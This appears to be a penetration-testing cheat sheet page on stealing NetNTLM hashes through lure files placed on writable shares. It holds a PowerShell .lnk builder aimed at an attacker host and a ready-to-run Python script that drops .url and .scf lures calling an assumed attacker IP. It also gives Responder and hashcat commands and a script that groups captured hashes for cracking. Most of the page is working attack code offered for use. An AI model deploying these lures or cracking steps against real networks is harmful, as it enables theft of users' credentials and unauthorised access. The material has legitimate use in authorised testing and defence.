
NTLM Hash Theft

Theft Files


Any writable directory that users browse (SMB shares, NFS exports, local folders) can be seeded with file types that make Windows Explorer authenticate to an attacker-controlled host as soon as the listing is rendered, leaking the browsing user's NetNTLM hash without them opening anything.

Manual: (.lnk)

# Build the shortcut with the WScript.Shell COM object and drop it on the share
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("\\DC01.domain.local\OpenShare\IT-Driver.lnk")
# UNC target on the attacker host: Explorer resolves it while listing the folder.
# The icon location is commonly pointed at the attacker host as well (\\<AttackerIP>\icon.ico).
$lnk.TargetPath = "\\<AttackerIP>\@ico.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "IT Driver"
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()

Automated (multi-type):

https://github.com/Greenwolf/ntlm_theft

Generate all file types:

python3 ntlm_theft.py -g all -s <attackerIP> -f '@myfile'
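The two plain-text lure formats the tool generates (.url and .scf) are short INI files whose IconFile key points at a UNC path on the attacker host. The example below is added here and is not code from this page or from ntlm_theft; it writes both formats into a directory and assumes a listener at 10.10.14.5 and the base name @IT-Driver (both constructed for the example). The .lnk format is binary and is left to the WScript.Shell snippet above or to the tool.

```python
"""Drop text-based NTLM lure files into a directory a victim will browse.

Only the plain-text formats are covered here (.url, .scf); .lnk is binary and
is built with WScript.Shell or with ntlm_theft instead.
"""
from pathlib import Path

# These are INI-style files parsed by Windows, so use CRLF line endings.
EOL = "\r\n"


def url_lure(attacker_ip: str, basename: str) -> str:
    """Internet Shortcut (.url). Explorer fetches IconFile over SMB when it
    renders the directory listing, so the victim authenticates to attacker_ip."""
    return EOL.join([
        "[InternetShortcut]",
        f"URL=file://\\\\{attacker_ip}\\{basename}.htm",
        "IconIndex=1",
        f"IconFile=\\\\{attacker_ip}\\{basename}.ico",
        "",
    ])


def scf_lure(attacker_ip: str, basename: str) -> str:
    """Shell Command File (.scf). Same IconFile trick; it fired on listing on
    older Windows, but patched Windows 10 and later no longer fetch SCF icons
    from UNC paths, so treat this one as a legacy-host lure."""
    return EOL.join([
        "[Shell]",
        "Command=2",
        f"IconFile=\\\\{attacker_ip}\\{basename}.ico",
        "[Taskbar]",
        "Command=ToggleDesktop",
        "",
    ])


LURES = {"url": url_lure, "scf": scf_lure}


def drop_lures(target_dir, attacker_ip: str, basename: str = "@IT-Driver") -> dict:
    """Write one lure per format into target_dir and return {path: content}.

    The '@' prefix sorts the files to the top of the listing, so they are
    rendered (and the auth forced) even if the victim only glances at the share.
    """
    target = Path(target_dir)
    target.mkdir(parents=True, exist_ok=True)
    written = {}
    for ext, builder in LURES.items():
        path = target / f"{basename}.{ext}"
        content = builder(attacker_ip, basename)
        # newline="" keeps the CRLFs exactly as built instead of translating them
        with path.open("w", encoding="ascii", newline="") as fh:
            fh.write(content)
        written[str(path)] = content
    return written


if __name__ == "__main__":
    # Constructed example: assumed attacker listener 10.10.14.5, local output dir.
    for p in drop_lures("lures", "10.10.14.5"):
        print("wrote", p)
```

Copy the output directory onto the writable share, then start the listener before anyone browses it; the .url file is the one to rely on against current Windows builds.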

Start a listener before the lures are browsed: Responder on Linux (for example, sudo responder -I eth0) or Inveigh on Windows. Whatever arrives is a NetNTLMv2 challenge-response (hashcat mode 5600), not an NT hash: it cannot be passed-the-hash, only cracked offline or relayed. Hash received? Try to crack it:

hashcat -m 5600 user.hash /usr/share/wordlists/rockyou.txt
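Responder and Inveigh log one line per authentication in the user::DOMAIN:... format hashcat reads, and a busy share produces many captures of the same account, each with a different server challenge (so hashcat treats each as a separate hash). Before cracking it pays to keep one capture per account and to split NetNTLMv1 (mode 5500) from NetNTLMv2 (mode 5600), since they need different modes. The script below is added here and is not part of the page or of either tool; the sample capture lines are constructed (made-up hex, not real captures) and the output file prefix is an assumption.

```python
"""Triage captured NetNTLM hashes before handing them to hashcat.

Line formats (as written by Responder/Inveigh and read by hashcat):
  NetNTLMv2 (5600): user::DOMAIN:challenge(16 hex):NTProofStr(32 hex):blob
  NetNTLMv1 (5500): user::DOMAIN:LMresp(48 hex):NTresp(48 hex):challenge(16 hex)
"""
import re

HEX = re.compile(r"^[0-9a-fA-F]+$")

# Constructed sample lines: hex values are made up, not real captures.
SAMPLE_CAPTURES = """\
jdoe::DOMAIN:1122334455667788:00112233445566778899aabbccddeeff:0101000000000000deadbeef
jdoe::DOMAIN:8877665544332211:ffeeddccbbaa99887766554433221100:0101000000000000cafebabe
svc_backup::DOMAIN:112233445566778899aabbccddeeff001122334455667788:aabbccddeeff00112233445566778899aabbccddeeff0011:1122334455667788
broken line without fields
"""


def classify(line: str):
    """Return ("netntlmv2", 5600) or ("netntlmv1", 5500), or None if the line
    is not a well-formed capture. Field lengths tell the two versions apart."""
    parts = line.strip().split(":")
    if len(parts) != 6:
        return None
    user, _, domain, f3, f4, f5 = parts
    if not user or not all(HEX.match(f) for f in (f3, f4, f5)):
        return None
    if len(f3) == 16 and len(f4) == 32 and len(f5) >= 16:
        return ("netntlmv2", 5600)
    if len(f3) == 48 and len(f4) == 48 and len(f5) == 16:
        return ("netntlmv1", 5500)
    return None


def triage(captures: str):
    """Group lines by hashcat mode, keeping only the first capture per account.

    Returns (by_mode, skipped): by_mode maps mode -> list of hash lines,
    skipped holds lines that did not parse (worth eyeballing, not cracking).
    """
    by_mode = {}
    seen = set()
    skipped = []
    for line in captures.splitlines():
        if not line.strip():
            continue
        kind = classify(line)
        if kind is None:
            skipped.append(line)
            continue
        _name, mode = kind
        user, _, domain = line.split(":", 3)[:3]
        key = (domain.lower(), user.lower(), mode)
        if key in seen:
            continue  # same account, same password: one challenge is enough
        seen.add(key)
        by_mode.setdefault(mode, []).append(line.strip())
    return by_mode, skipped


def hashcat_commands(by_mode, prefix="captured",
                     wordlist="/usr/share/wordlists/rockyou.txt"):
    """Write one hash file per mode and return the matching hashcat commands."""
    cmds = []
    for mode, lines in sorted(by_mode.items()):
        path = f"{prefix}-{mode}.hash"
        with open(path, "w") as fh:
            fh.write("\n".join(lines) + "\n")
        cmds.append(f"hashcat -m {mode} {path} {wordlist}")
    return cmds


if __name__ == "__main__":
    grouped, bad = triage(SAMPLE_CAPTURES)
    for cmd in hashcat_commands(grouped):
        print(cmd)
    for line in bad:
        print("skipped:", line)
```

On real input, feed it the contents of Responder's logs/*NTLMv2-SSP*.txt files (or Inveigh's capture file); a NetNTLMv1 line showing up is itself a finding, since it means a client is still allowed to fall back to NTLMv1.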

OR: Relay Attacks (relay the captured authentication to another host instead of cracking it)

Poisoning


Relaying


Misc Locations